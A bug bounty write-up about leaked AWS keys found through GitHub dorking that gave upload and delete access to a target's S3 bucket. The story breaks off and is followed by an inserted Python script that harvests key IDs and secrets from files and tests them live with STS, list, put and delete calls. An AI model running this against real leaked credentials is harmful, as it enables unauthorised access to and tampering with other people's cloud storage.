RCE VIA S3-BUCKET

8 hours ago

2BM03Z

Praise be to God, who taught by the pen and taught man what he did not know; and prayers and peace be upon the best teacher of good to mankind, Muhammad. Now, to proceed:

“O God, bless our master Mohammed and grant him peace.”

Hello, Hackers!
I hope you’re all doing well. This is my first write-up, and I wanted to share it with you. If there are any mistakes, please let me know in the comments.

Whoami?
My name is Ahmed Moez, or you can call me “2BM03z”. I’m 21 years old, and I started bug hunting about 3 months ago.

Summary
The vulnerability I’m sharing with you was found in a bug bounty program on HackerOne; let’s call the target target.com. It is the RCE via S3 bucket finding from the title, and it was discovered through GitHub dorking. The flaw let me access the target’s S3 bucket and upload or delete any file there, which amounts to full control over the bucket’s contents. Whether write access to a bucket turns into code execution depends on how the target consumes what is stored there (for example, serving it as a static site or pulling deployment artifacts from it), so that link is worth checking before calling such a finding RCE.

Let’s start the story in detail.

The first thing I always do when testing a website is recon and dorking, so I started with GitHub dorking. Going through all the repositories on GitHub usually takes me around 1–2 hours.

So I searched GitHub for target.com “aws_access_key_id”, and I was surprised by how many repositories came back. While going through and filtering each repo, I saw something interesting
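The search above returns files, not confirmed credentials, so the next step is triage: extract anything that looks like an AWS access key, drop the documentation placeholders that pollute every such search, and then test what a surviving key can actually do against the bucket. The following is an added example of that triage and is not the author’s code. The file contents in SAMPLE_FILES are constructed to look like typical hits (a real-looking config file, the AWS docs example key from a README, and an empty .env template); the bucket name and probe object name in check_bucket_access are assumptions, and that function needs boto3 plus network access, so it is not invoked automatically.

```python
"""Triage for GitHub dorking hits on aws_access_key_id (added example, not the write-up's code)."""
import re
from typing import Dict, List, Optional

# Constructed sample of file contents a search for target.com "aws_access_key_id" might surface.
# The key ID and secret in settings.py are made up and have the right shape only.
SAMPLE_FILES: Dict[str, str] = {
    "config/settings.py": (
        'AWS_ACCESS_KEY_ID = "AKIAZZ0123456789ABCD"\n'
        'AWS_SECRET_ACCESS_KEY = "abcdefghijklmnopqrstuvwxyz0123456789ABCD"\n'
        'S3_BUCKET = "assets.target.com"\n'
    ),
    # The AWS documentation example pair: it shows up in countless repos and is never a real credential.
    "docs/README.md": (
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    ".env.example": "AWS_ACCESS_KEY_ID=\nAWS_SECRET_ACCESS_KEY=\n",
}

# Long-term access key IDs start with AKIA; temporary ones start with ASIA and also need a session token,
# which the bucket check below does not pass, so ASIA hits are reported but will fail the STS call.
KEY_ID_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# Secret access keys are 40 characters of base64-like text; only take one that sits next to its label.
SECRET_RE = re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+]{40})")


def is_placeholder(key_id: str) -> bool:
    """The AWS docs example keys (and many copied templates) spell EXAMPLE inside the key ID."""
    return "EXAMPLE" in key_id


def find_candidates(files: Dict[str, str]) -> List[dict]:
    """Return one candidate per file that contains a non-placeholder key ID, with its secret if present."""
    candidates = []
    for path, text in files.items():
        key_ids = [k for k in KEY_ID_RE.findall(text) if not is_placeholder(k)]
        if not key_ids:
            continue
        secret_match = SECRET_RE.search(text)
        secret: Optional[str] = secret_match.group(1) if secret_match else None
        candidates.append({"path": path, "access_key_id": key_ids[0], "secret": secret})
    return candidates


def check_bucket_access(access_key_id: str, secret: str, bucket: str,
                        probe_key: str = "bounty-probe.txt") -> dict:
    """Confirm the key is live via STS, then test list, write and delete on the bucket with one probe object.

    Uses a single small object and removes it again so the test leaves no trace beyond the bucket's logs.
    Requires boto3 and network access; bucket and probe_key are assumptions for the example.
    """
    import boto3
    from botocore.exceptions import ClientError

    session = boto3.Session(aws_access_key_id=access_key_id, aws_secret_access_key=secret)
    result = {"identity": None, "list": False, "write": False, "delete": False}
    try:
        result["identity"] = session.client("sts").get_caller_identity()["Arn"]
    except ClientError:
        return result  # revoked or invalid key: nothing further to test
    s3 = session.client("s3")
    probes = (
        ("list", lambda: s3.list_objects_v2(Bucket=bucket, MaxKeys=1)),
        ("write", lambda: s3.put_object(Bucket=bucket, Key=probe_key, Body=b"bounty probe")),
        ("delete", lambda: s3.delete_object(Bucket=bucket, Key=probe_key)),
    )
    for action, call in probes:
        try:
            call()
            result[action] = True
        except ClientError:
            pass  # AccessDenied (or NoSuchBucket) for this action; keep testing the others
    return result


if __name__ == "__main__":
    for candidate in find_candidates(SAMPLE_FILES):
        print(candidate)
    # To test a live key against the assumed bucket, uncomment:
    # print(check_bucket_access(c["access_key_id"], c["secret"], "assets.target.com"))
```

Running the block on the constructed sample reports only the settings.py pair; the README hit is discarded as the AWS docs example, and the empty template yields nothing. Against a live key, the STS identity tells you which account and principal leaked, and the three probe results map directly onto what the write-up reports (list, upload, delete), while keeping the footprint to one object that is deleted again.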